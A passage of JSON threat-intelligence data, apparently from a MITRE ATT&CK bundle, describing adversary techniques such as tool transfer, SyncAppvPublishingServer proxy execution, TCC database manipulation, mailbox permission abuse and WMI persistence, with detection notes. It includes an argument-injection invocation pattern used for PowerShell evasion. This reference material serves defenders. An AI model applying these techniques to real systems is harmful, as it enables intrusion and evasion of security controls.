variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["John Page (aka hyp3rlinx), ApparitionSec", "Mark Wee", "Shailesh Tiwary (Indian Army)", "The DFIR Report", "Alain Homewood", "Joe Wise", "Jeremy Hedges", "Selena Larson, @selenalarson"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows netsh interface portproxy modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "created": "2017-05-31T21:31:16.408Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1105", "external_id": "T1105"}, {"source_name": "T1105: Trellix_search-ms", "description": " Mathanraj Thangaraju, Sijo Jacob. (2023, July 26). Beyond File Search: A Novel Method for Exploiting the \"search-ms\" URI Protocol Handler. Retrieved March 15, 2024.", "url": "https://www.trellix.com/blogs/research/beyond-file-search-a-novel-method/"}, {"source_name": "Dropbox Malware Sync", "description": "David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.", "url": "https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "t1105_lolbas", "description": "LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.", "url": "https://lolbas-project.github.io/#t1105"}, {"source_name": "PTSecurity Cobalt Dec 2016", "description": "Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.", "url": "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:12.723Z", "name": "Commonly Used Port", "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below. \n \n * TCP:80 (HTTP) \n * TCP:443 (HTTPS) \n * TCP/UDP:53 (DNS) \n * TCP:1024-4999 (OPC on XP/Win2k3) \n * TCP:49152-65535 (OPC on Vista and later) \n * TCP:23 (TELNET) \n * UDP:161 (SNMP) \n * TCP:502 (MODBUS) \n * TCP:102 (S7comm/ISO-TSAP) \n * TCP:20000 (DNP3) \n * TCP:44818 (Ethernet/IP)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matan Dobrushin - Otorio"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Flow", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0885", "external_id": "T0885"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-18T23:51:40.464Z", "name": "SyncAppvPublishingServer", "description": "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)\n \nThe SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)\n\nAdversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by \"living off the land.\"(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)\n\nFor example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)\n\n`SyncAppvPublishingServer.vbs \"n; {PowerShell}\"`", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Shaul Vilkomir-Preisman"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", "created": "2024-02-06T16:20:41.647Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1216/002", "external_id": "T1216.002"}, {"source_name": "4 - appv", "description": "John Fokker. (2022, March 17). Suspected DarkHotel APT activity update. Retrieved February 6, 2024.", "url": "https://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-update/"}, {"source_name": "2 - appv", "description": "Microsoft. (2022, November 3). Getting started with App-V for Windows client. Retrieved February 6, 2024.", "url": "https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started"}, {"source_name": "5 - appv", "description": "Nick Landers, Casey Smith. (n.d.). /Syncappvpublishingserver.vbs. Retrieved February 6, 2024.", "url": "https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"}, {"source_name": "7 - appv", "description": "Nick Landers. (2017, August 8). Need a signed alternative to Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered.. Retrieved February 6, 2024.", "url": "https://twitter.com/monoxgas/status/895045566090010624"}, {"source_name": "3 - appv", "description": "Raj Chandel. (2022, March 17). Indirect Command Execution: Defense Evasion (T1202). Retrieved February 6, 2024.", "url": "https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/"}, {"source_name": "1 - appv", "description": "SEONGSU PARK. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved February 6, 2024.", "url": "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"}, {"source_name": "6 - appv", "description": "Strontic. (n.d.). SyncAppvPublishingServer.exe. Retrieved February 6, 2024.", "url": "https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:12.926Z", "name": "Project File Infection", "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function. (Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques. (Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing. (Citation: PLCdev)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["File: File Modification"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0873", "external_id": "T0873"}, {"source_name": "Beckhoff", "description": "Beckhoff TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ", "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id="}, {"source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf"}, {"source_name": "PLCdev", "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21 ", "url": "http://www.plcdev.com/book/export/html/373"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-03T15:46:06.706Z", "name": "Additional Email Delegate Permissions", "description": "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. \n\nFor example, the Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) \n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user\u2019s mail folders.(Citation: Mandiant Defend UNC2452 White Paper)\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Microsoft Detection and Response Team (DART)", "Mike Burns, Mandiant", "Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)", "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)", "Arad Inbar, Fidelis Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from \u202freal accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "Google Workspace"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", "created": "2020-01-19T16:54:28.516Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1098/002", "external_id": "T1098.002"}, {"source_name": "Bienstock, D. - Defending O365 - 2019", "description": "Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.", "url": "https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365"}, {"source_name": "Crowdstrike Hiding in Plain Sight 2018", "description": "Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.", "url": "https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/"}, {"source_name": "Google Ensuring Your Information is Safe", "description": "Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022.", "url": "https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html"}, {"source_name": "Gmail Delegation", "description": "Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022.", "url": "https://support.google.com/a/answer/7223765?hl=en"}, {"source_name": "FireEye APT35 2018", "description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.", "url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf"}, {"source_name": "Mandiant Defend UNC2452 White Paper", "description": "Mandiant. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved January 22, 2021.", "url": "https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452"}, {"source_name": "Microsoft - Add-MailboxPermission", "description": "Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September 13, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Code Signing Certificates", "description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15", "created": "2020-10-01T02:11:47.237Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/003", "external_id": "T1588.003"}, {"source_name": "Wikipedia Code Signing", "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", "url": "https://en.wikipedia.org/wiki/Code_signing"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Network Share Connection Removal", "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\\\system\\share /delete command. (Citation: Technet Net Use)\n\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Host forensic analysis"], "x_mitre_permissions_required": ["Administrator", "User"], "x_mitre_system_requirements": ["Established network share connection to a remote system. Level of access depends on permissions of the account used."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e7eab98d-ae11-4491-bd28-a53ba875865a", "created": "2017-05-31T21:31:38.350Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1126", "external_id": "T1126"}, {"source_name": "Technet Net Use", "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", "url": "https://technet.microsoft.com/bb490717.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-03-05T16:13:38.643Z", "name": "Serverless Execution", "description": "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)\n\nServerless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Shailesh Tiwary (Indian Army)", "Praetorian", "Oleg Kolesnikov, Securonix", "Cisco", "Varonis Threat Labs", "Alex Soler, AttackIQ", "Vectra AI"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["SaaS", "IaaS", "Office 365"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3", "created": "2022-05-27T13:19:51.112Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1648", "external_id": "T1648"}, {"source_name": "Microsoft DART Case Report 001", "description": "Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.", "url": "https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team"}, {"source_name": "Backdooring an AWS account", "description": "Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.", "url": "https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9"}, {"source_name": "Varonis Power Automate Data Exfiltration", "description": "Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.", "url": "https://www.varonis.com/blog/power-automate-data-exfiltration"}, {"source_name": "Cado Security Denonia", "description": "Matt Muir. (2022, April 6). Cado Discovers Denonia: The First Malware Specifically Targeting Lambda. Retrieved May 27, 2022.", "url": "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/"}, {"source_name": "Rhino Security Labs AWS Privilege Escalation", "description": "Rhino Security Labs. (n.d.). AWS IAM Privilege Escalation \u2013 Methods and Mitigation. Retrieved May 27, 2022.", "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/"}, {"source_name": "Rhingo Security Labs GCP Privilege Escalation", "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform \u2013 Part 1 (IAM). Retrieved May 27, 2022.", "url": "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-17T00:02:12.021Z", "name": "TCC Manipulation", "description": "Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to execute malicious applications with elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).\n\nWhen an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise abuse the TCC service to execute malicious content. This can be done in various ways, including using privileged system applications to execute malicious payloads or manipulating the database to grant their application TCC permissions. \n\nFor example, adversaries can use Finder, which has FDA permissions by default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) while preventing a user prompt. For a system without System Integrity Protection (SIP) enabled, adversaries have also manipulated the operating system to load an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055)) into targeted applications with the desired TCC permissions.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Marina Liang"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb", "created": "2024-03-21T21:10:57.322Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1548/006", "external_id": "T1548.006"}, {"source_name": "welivesecurity TCC", "description": "Marc-Etienne M.L\u00e9veill\u00e9. (2022, July 19). I see what you did there: A look at the CloudMensis macOS spyware. Retrieved March 21, 2024.", "url": "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/"}, {"source_name": "TCC Database", "description": "Marina Liang. (2024, April 23). Return of the mac(OS): Transparency, Consent, and Control (TCC) Database Manipulation. Retrieved March 28, 2024.", "url": "https://interpressecurity.com/resources/return-of-the-macos-tcc/"}, {"source_name": "TCC macOS bypass", "description": "Phil Stokes. (2021, July 1). Bypassing macOS TCC User Privacy Protections By Accident and Design. Retrieved March 21, 2024.", "url": "https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Windows Management Instrumentation Event Subscription", "description": "Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e906ae4d-1d3a-4675-be23-22f7311c0da4", "created": "2017-05-31T21:31:05.140Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": 